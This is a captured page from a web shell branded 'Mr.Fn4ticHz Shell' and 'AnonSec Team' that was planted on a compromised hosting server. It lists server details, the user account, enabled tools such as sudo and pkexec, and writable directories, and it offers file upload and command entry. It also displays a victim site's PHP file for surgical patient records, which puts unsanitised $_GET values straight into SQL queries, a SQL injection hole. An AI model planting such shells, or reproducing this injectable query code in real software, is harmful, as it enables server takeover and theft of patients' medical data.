Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.216.223.196
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/show_Routine_Information.php


       <table id='example2' class='table table-bordered table-hover'>
<?php 
	include("../../dbconnection.php");
	$Routine_Information ="SELECT * FROM Routine_Information WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qRoutine_Information = mysqli_query($con,$Routine_Information);
		while($rRoutine_Information = mysqli_fetch_array($qRoutine_Information))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Operative Type: </td>
<td width='50%'>$rRoutine_Information[Information_Obtained_from] </td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Date of Operative procedure :  </td>
<td width='50%'>$rRoutine_Information[Date_of_Operative_procedure]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Expected Sign in of Operative procedure :  </td>
<td width='50%'>$rRoutine_Information[Time_of_Operative_procedure]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Name of Surgeon :  </td>
<td width='50%'>$rRoutine_Information[name_Surgeon]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Name of Anesthetist :  </td>
<td width='50%'>$rRoutine_Information[Name_of_Anesthetist]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Pre-Operative Diagnosis :  </td>
<td width='50%'>$rRoutine_Information[Pre_Operative_Diagnosis]</td>
</tr>






<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Expected Sign out :  </td>
<td width='50%'>$rRoutine_Information[Duration_Surgery]</td>
</tr>



<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  WRITTEN CONSENT  :  </td>
<td width='50%'>$rRoutine_Information[WRITTEN_CONSENT]</td>
</tr>

";
}
?>

				</table>



Anon7 - 2022
AnonSec Team